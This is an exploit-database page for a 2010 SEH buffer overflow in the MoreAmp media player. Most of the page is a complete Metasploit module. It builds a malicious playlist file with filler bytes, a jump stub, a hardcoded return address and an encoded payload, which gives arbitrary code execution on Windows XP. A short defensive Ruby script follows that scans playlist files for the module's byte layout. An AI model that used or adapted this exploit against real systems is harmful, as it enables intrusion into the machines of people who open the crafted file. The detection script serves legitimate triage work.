MoreAmp Seh Buffer Overflow (meta) - exploit.company
Vendor: MoreAmp
By: MadjiX
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: MoreAmp
Affected Version From: 0.1.25 Beta
Affected Version To: 0.1.25 Beta
Patch Exists: NO
Platforms Tested: Windows
Year: 2010

MoreAmp Seh Buffer Overflow (meta)

This module exploits an SEH overflow in MoreAmp 0.1.25 Beta. By creating a specially crafted .m3u file, an attacker may be able to execute arbitrary code.

Mitigation:

Apply the latest patch or update to a non-vulnerable version.

Exploit-DB raw data:

#MoreAmp Seh Buffer Overflow (meta)
#Greetz:His0k4 , Bibi-info , Volc4n0
#sec4ever.com
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Remote::Seh
 
    def initialize(info = {})
        super(update_info(info,
            'Name' => 'MoreAmp 0.1.25 Beta Buffer Overflow (SEH)',
            'Description' => %q{
                This module exploits a SEH overflow in 0.1.25 MoreAmp Beta
            By creating a specially crafted .m3u file, an attacker may be able
            to execute arbitrary code.
            },
            'License' => MSF_LICENSE,
            'Author' => 'MadjiX',
            'Version' => 'Version 1',
            'References' =>
                [
                    [ 'OSVDB', '65789' ],
                    [ 'URL', 'http://www.exploit-db.com/exploits/13942/' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload' =>
                {
                    'Space' => 1400,
                    'BadChars' => "\x00\x20\x0a\x0d",
                    'StackAdjustment' => -3500,
                },
            'Platform' => 'win',
            'Targets' =>
                [
                    [ 'Windows XP SP3 Fr', { 'Ret' => 0x7C86467B} ], # 0x7C86467B jmp esp kernel.32
 
                ],
            'Privileged' => false,
            'DisclosureDate'  => '17-07-2010',
            'DefaultTarget' => 0))
 
        register_options(
            [
                OptString.new('FILENAME', [ false, 'The file name.', 'MadjiX.maf']),
            ], self.class)
    end
 
 
    def exploit
 
        sploit = rand_text_alphanumeric(108)
        sploit << "\xeb\x06\x90\x90"
        sploit << [target.ret].pack('V')
        sploit << payload.encoded
        sploit << rand_text_alphanumeric(400 - payload.encoded.length)
 
        maffile = sploit
        print_status("Creating '#{datastore['FILENAME']}' file ...")
        file_create(maffile)
 
    end
 
end
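
For triage where no patch is available, playlist files can be checked for the layout the module above writes: 108 filler bytes followed by the bytes "\xeb\x06\x90\x90", all on a single line. The Ruby below is an added example, not part of the Exploit-DB module. `scan_playlist`, the constant names and both sample inputs are constructed for illustration, and the control-byte rule is an assumed heuristic rather than a vendor signature.

```ruby
# Added example (not from the Exploit-DB module): triage playlist files for
# entries carrying raw control bytes, which a text path or URL never needs.
CTRL       = /[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/n  # C0 controls except TAB/LF/CR, plus DEL
NSEH_STUB  = "\xEB\x06\x90\x90".b                 # 4 bytes the module writes after its filler
FILLER_LEN = 108                                  # filler length the module uses

# Constructed samples. CRAFTED mimics only the layout; it holds no payload or address.
CLEAN   = "#EXTM3U\r\n#EXTINF:215,Artist - Title\r\nC:\\Music\\caf\xE9.mp3\r\n".b
CRAFTED = "#EXTM3U\n".b + ("A" * FILLER_LEN) + NSEH_STUB + "BBBB" + ("C" * 64) + "\n"

# Returns one finding per suspicious line of the raw playlist bytes.
def scan_playlist(raw)
  findings = []
  raw.b.split(/\r?\n/).each_with_index do |entry, i|
    ctrl_at = entry.index(CTRL)
    next if ctrl_at.nil?                          # text-only entry (Latin-1 names pass)
    findings << {
      line: i + 1,
      length: entry.bytesize,
      first_control_byte: ctrl_at,                # byte offset within the line
      module_layout: entry.index(NSEH_STUB) == FILLER_LEN
    }
  end
  findings
end

if $PROGRAM_NAME == __FILE__
  { "clean" => CLEAN, "crafted" => CRAFTED }.each do |name, data|
    hits = scan_playlist(data)
    puts "#{name}: #{hits.empty? ? 'no findings' : hits.inspect}"
  end
end
```

The check works on raw bytes and ignores the file extension, so it applies equally to any file the player would open as a playlist.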